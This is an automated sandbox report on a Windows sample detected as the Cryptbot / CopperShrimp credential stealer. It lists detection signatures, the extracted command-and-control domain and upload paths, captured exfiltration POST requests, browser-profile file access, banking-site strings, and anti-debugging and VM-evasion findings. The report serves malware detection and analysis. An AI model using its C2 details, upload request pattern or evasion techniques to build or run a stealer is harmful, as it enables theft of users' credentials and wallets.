Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vk2wTOx91s.exe

Overview

General Information

Sample name:vk2wTOx91s.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
Analysis ID:1472695
MD5:2fbf1fc802ac4b340b1fd7b3e4659974
SHA1:463182267627d5ce5f3196479820e7bae4d18a52
SHA256:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
Infos:

Detection

CopperShrimp, Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected CopperShrimp
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • vk2wTOx91s.exe (PID: 3788 cmdline: "C:\Users\user\Desktop\vk2wTOx91s.exe" MD5: 2FBF1FC802AC4B340B1FD7B3E4659974)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["tztwo2ht.top"]}
{"C2 url": "tztwo2ht.top", "urls": ["/index.php", "/gate.php", "/zip.php", "/upload.php"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: vk2wTOx91s.exe PID: 3788JoeSecurity_CryptbotYara detected CryptbotJoe Security
    Process Memory Space: vk2wTOx91s.exe PID: 3788JoeSecurity_CopperShrimpYara detected CopperShrimpJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.vk2wTOx91s.exe.50000.0.unpackJoeSecurity_CopperShrimpYara detected CopperShrimpJoe Security
        No Sigma rule has matched
        Timestamp:07/13/24-19:08:46.717453
        SID:2856511
        Source Port:49704
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/13/24-19:08:46.291207
        SID:2054383
        Source Port:58241
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:07/13/24-19:08:46.717453
        SID:2054350
        Source Port:49704
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://brewdogebar.com/code.vueAvira URL Cloud: Label: malware
        Source: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: CopperShrimp {"C2 url": "tztwo2ht.top", "urls": ["/index.php", "/gate.php", "/zip.php", "/upload.php"]}
        Source: vk2wTOx91s.exe.3788.0.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["tztwo2ht.top"]}
        Source: https://brewdogebar.com/code.vueVirustotal: Detection: 11%Perma Link
        Source: vk2wTOx91s.exeReversingLabs: Detection: 73%
        Source: vk2wTOx91s.exeVirustotal: Detection: 46%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: vk2wTOx91s.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005A6E0 CryptUnprotectData,0_2_0005A6E0
        Source: vk2wTOx91s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: vk2wTOx91s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00059040 FindFirstFileW,FindNextFileW,FindClose,0_2_00059040
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005EF00 FindFirstFileW,0_2_0005EF00
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior

        Networking

        barindex
        Source: TrafficSnort IDS: 2054383 ET TROJAN Cryptbot CnC DGA Domain (two2) 192.168.2.5:58241 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2856511 ETPRO TROJAN Win32/CopperShrimp Stealer Related Activity (POST) 192.168.2.5:49704 -> 176.113.81.61:80
        Source: TrafficSnort IDS: 2054350 ET TROJAN Win32/Cryptbotv2 CnC Activity (POST) M4 192.168.2.5:49704 -> 176.113.81.61:80
        Source: Malware configuration extractorURLs: tztwo2ht.top
        Source: Malware configuration extractorURLs: tztwo2ht.top
        Source: Joe Sandbox ViewASN Name: RETN-ASEU RETN-ASEU
        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary77938395User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 348Host: tztwo2ht.top
        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary40876462User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 1424Host: tztwo2ht.top
        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary86828523User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 79310Host: tztwo2ht.top
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: tztwo2ht.top
        Source: unknownHTTP traffic detected: POST /upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary77938395User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 348Host: tztwo2ht.top
        Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tztwo2ht.top/
        Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.00000000016F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tztwo2ht.top/upload.php
        Source: vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tztwo2ht.top/upload.phpe
        Source: vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tztwo2ht.top:80/upload.php
        Source: vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2093562903.0000000001713000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tztwo2ht.top:80/upload.phpMicrosoft
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: vk2wTOx91s.exe, vk2wTOx91s.exe, 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://brewdogebar.com/code.vue
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

        System Summary

        barindex
        Source: vk2wTOx91s.exeStatic PE information: section name: .[SL
        Source: vk2wTOx91s.exeStatic PE information: section name: .&ZK
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00053CD00_2_00053CD0
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005EFB00_2_0005EFB0
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_000510A00_2_000510A0
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0006B27D0_2_0006B27D
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_000534800_2_00053480
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_000535800_2_00053580
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_007B26420_2_007B2642
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0070269F0_2_0070269F
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005A8F00_2_0005A8F0
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00051C400_2_00051C40
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00052D000_2_00052D00
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: String function: 0005F7F0 appears 52 times
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: String function: 0005F8B0 appears 41 times
        Source: vk2wTOx91s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: vk2wTOx91s.exeStatic PE information: Section: .&ZK ZLIB complexity 0.992732498185058
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile created: C:\Users\user\AppData\Local\PoconusuriJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: vk2wTOx91s.exe, 00000000.00000003.2092393305.0000000001924000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2092651705.0000000001924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: vk2wTOx91s.exeReversingLabs: Detection: 73%
        Source: vk2wTOx91s.exeVirustotal: Detection: 46%
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: vk2wTOx91s.exeStatic file information: File size 1949184 > 1048576
        Source: vk2wTOx91s.exeStatic PE information: Raw size of .&ZK is bigger than: 0x100000 < 0x1d9800
        Source: vk2wTOx91s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_000603D0 LoadLibraryW,GetProcAddress,0_2_000603D0
        Source: initial sampleStatic PE information: section where entry point is pointing to: .&ZK
        Source: vk2wTOx91s.exeStatic PE information: section name: .WaG
        Source: vk2wTOx91s.exeStatic PE information: section name: .[SL
        Source: vk2wTOx91s.exeStatic PE information: section name: .&ZK
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_006EC4D1 pushfd ; ret 0_2_006EC50E
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00774688 push ss; retf B8E1h0_2_007746E3
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_006E7AFD push 80857E55h; retf 0_2_006E7B0A
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_006FFB21 push ecx; ret 0_2_006FFB34
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_006E8E7A pushfd ; retf 0_2_006E8E7E
        Source: vk2wTOx91s.exeStatic PE information: section name: .&ZK entropy: 7.996151903965326

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeMemory written: PID: 3788 base: 1440005 value: E9 8B 2F AB 75 Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeMemory written: PID: 3788 base: 76EF2F90 value: E9 7A D0 54 8A Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeMemory written: PID: 3788 base: 1450007 value: E9 EB DF AD 75 Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeMemory written: PID: 3788 base: 76F2DFF0 value: E9 1E 20 52 8A Jump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 8138A8
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 9A9ECC
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 9A0717
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 823FE1
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 833491
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 97EE48
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 81FF81
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 9C5180
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 980BC5
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeAPI/Special instruction interceptor: Address: 9C4BBE
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSpecial instruction interceptor: First address: 9E7998 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exe TID: 3440Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00059040 FindFirstFileW,FindNextFileW,FindClose,0_2_00059040
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005EF00 FindFirstFileW,0_2_0005EF00
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128520300.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128520300.0000000001700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWak
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: vk2wTOx91s.exe, 00000000.00000003.2092737236.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeSystem information queried: KernelDebuggerInformationJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_000603D0 LoadLibraryW,GetProcAddress,0_2_000603D0
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00066085 mov eax, dword ptr fs:[00000030h]0_2_00066085
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00063D56 mov eax, dword ptr fs:[00000030h]0_2_00063D56
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_00060F25 cpuid 0_2_00060F25
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: GetLocaleInfoW,0_2_0005D570
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\vk2wTOx91s.exeCode function: 0_2_0005D330 GetTimeZoneInformation,0_2_0005D330

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0.2.vk2wTOx91s.exe.50000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
